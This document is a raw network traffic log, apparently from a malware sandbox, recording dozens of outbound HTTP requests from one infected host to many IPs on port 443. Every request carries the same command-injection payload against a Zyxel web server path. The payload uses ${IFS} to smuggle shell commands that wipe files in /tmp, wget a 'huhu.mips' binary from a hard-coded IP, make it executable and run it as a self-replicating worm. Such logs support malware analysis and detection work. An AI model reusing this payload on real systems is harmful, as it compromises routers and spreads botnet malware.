                                                        Feb 2, 2024 06:21:31.364272118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9669192.168.2.1456430139.177.71.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364305973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9670192.168.2.145372274.230.118.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364356041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9671192.168.2.1436066159.230.55.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364375114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9672192.168.2.146032258.135.232.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364428043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9673192.168.2.1457194217.252.181.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364454985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9674192.168.2.145587217.104.41.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364515066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9675192.168.2.1451378194.167.113.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364564896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9676192.168.2.1455294180.158.176.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364609957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9677192.168.2.144928220.147.92.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364645958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9678192.168.2.1453024210.181.208.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364682913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9679192.168.2.1453716136.23.228.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364701033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9680192.168.2.1454720146.79.164.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364742994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9681192.168.2.143580692.131.198.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364806890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9682192.168.2.1447882115.99.20.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364850998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9683192.168.2.1432782112.99.49.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364887953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9684192.168.2.145310070.59.68.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364909887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9685192.168.2.144027643.116.236.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364948988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9686192.168.2.1433258114.132.75.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364964008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9687192.168.2.1445148136.234.74.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365036011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9688192.168.2.1455726121.43.153.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365087986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9689192.168.2.1436340219.217.173.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365138054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9690192.168.2.1440202162.39.100.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365180016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9691192.168.2.144878646.27.192.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365236998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9692192.168.2.145626289.199.222.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365283966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9693192.168.2.144319831.135.146.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365319014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9694192.168.2.1438880115.180.63.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365374088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9695192.168.2.1458366179.199.210.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365410089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9696192.168.2.1443000206.194.97.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365442038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9697192.168.2.144467814.180.231.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365489006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9698192.168.2.1455308209.44.90.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365519047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9699192.168.2.144230650.2.84.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365556002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9700192.168.2.145802068.5.41.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365613937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9701192.168.2.1439338188.205.253.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365667105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9702192.168.2.1437288148.132.247.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365712881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9703192.168.2.1450486104.163.199.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365742922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9704192.168.2.145156618.155.225.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365791082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9705192.168.2.1446586213.54.35.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365825891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9706192.168.2.1451472112.90.34.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365849018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9707192.168.2.1455632194.227.183.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365902901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9708192.168.2.145727865.86.23.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365936041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9709192.168.2.1449916137.178.165.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.365967989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9710192.168.2.1451786173.201.217.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366015911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9711192.168.2.1437736126.106.218.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366044998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9712192.168.2.1441924121.177.215.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366080046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9713192.168.2.1443864109.192.64.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366127968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9714192.168.2.1456684206.0.1.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366163015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9715192.168.2.1451704172.45.213.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366187096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9716192.168.2.145843027.99.152.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366220951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9717192.168.2.1454036103.26.11.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366287947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9718192.168.2.1441802170.123.86.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366318941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9719192.168.2.144753695.38.229.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366383076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9720192.168.2.143731043.145.191.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366420984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9721192.168.2.1433730156.45.204.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366475105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9722192.168.2.1444780156.29.253.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366482019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9723192.168.2.1443158130.103.56.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366538048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9724192.168.2.1434960101.223.27.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366596937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9725192.168.2.1436222102.167.65.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366611958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9726192.168.2.1436472145.52.180.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366666079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9727192.168.2.146071639.190.80.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366688013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9728192.168.2.1456366187.155.6.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366720915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9729192.168.2.1453082172.146.103.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366776943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9730192.168.2.1440682108.24.217.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366816998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9731192.168.2.1446482188.174.250.91443
                                                        TimestampBytes transferredDirectionData
